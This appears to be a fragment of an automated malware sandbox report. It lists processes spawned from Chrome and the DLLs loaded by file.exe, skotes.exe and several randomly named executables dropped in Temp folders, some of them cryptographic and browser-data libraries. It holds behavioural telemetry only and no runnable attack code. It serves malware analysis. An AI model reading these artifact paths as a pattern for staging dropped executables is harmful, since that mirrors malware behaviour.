                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                          Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: mstask.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: dui70.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: duser.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: chartv.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: oleacc.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: atlthunk.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: wtsapi32.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: winsta.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: explorerframe.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeSection loaded: dhcpcsvc6.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeSection loaded: dhcpcsvc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeSection loaded: napinsp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeSection loaded: pnrpnsp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeSection loaded: wshbth.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeSection loaded: nlaapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeSection loaded: winrnr.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeSection loaded: napinsp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeSection loaded: pnrpnsp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeSection loaded: wshbth.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeSection loaded: nlaapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeSection loaded: winrnr.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeSection loaded: windowscodecs.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeSection loaded: napinsp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeSection loaded: pnrpnsp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeSection loaded: wshbth.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeSection loaded: nlaapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeSection loaded: winrnr.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeSection loaded: napinsp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeSection loaded: pnrpnsp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeSection loaded: wshbth.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeSection loaded: nlaapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeSection loaded: winrnr.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeSection loaded: dlnashext.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeSection loaded: wpdshext.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007913001\159c892ab5.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: winmm.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: webio.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeSection loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeSection loaded: winmm.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeSection loaded: wininet.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeSection loaded: rstrtmgr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeSection loaded: ncrypt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeSection loaded: ntasn1.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeSection loaded: iertutil.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeSection loaded: wldp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeSection loaded: profapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeSection loaded: winhttp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeSection loaded: iphlpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeSection loaded: winnsi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeSection loaded: urlmon.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeSection loaded: srvcli.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeSection loaded: netutils.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeSection loaded: dpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeSection loaded: cryptbase.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeSection loaded: rasadhlp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeSection loaded: ntmarta.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeSection loaded: mozglue.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeSection loaded: wsock32.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeSection loaded: vcruntime140.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeSection loaded: msvcp140.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeSection loaded: vcruntime140.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeSection loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeSection loaded: propsys.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeSection loaded: edputil.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeSection loaded: windows.staterepositoryps.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeSection loaded: wintypes.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeSection loaded: appresolver.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeSection loaded: bcp47langs.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeSection loaded: slc.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeSection loaded: userenv.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeSection loaded: sppc.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeSection loaded: onecorecommonproxystub.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeSection loaded: onecoreuapcommonproxystub.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeSection loaded: pcacli.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeSection loaded: mpr.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007915001\a78a39a396.exeSection loaded: sfc_os.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: winmm.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: wldp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: winhttp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: webio.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: mswsock.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: iphlpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: winnsi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: sspicli.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: dnsapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: rasadhlp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: fwpuclnt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: schannel.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: mskeyprotect.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: ntasn1.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: ncrypt.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: ncryptsslp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: msasn1.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: cryptsp.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: rsaenh.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: cryptbase.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: gpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: dpapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: wbemcomn.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: amsi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: userenv.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: profapi.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: version.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Users\user\AppData\Local\Temp\1007914001\7b9f3f6834.exeSection loaded: ondemandconnroutehelper.dll
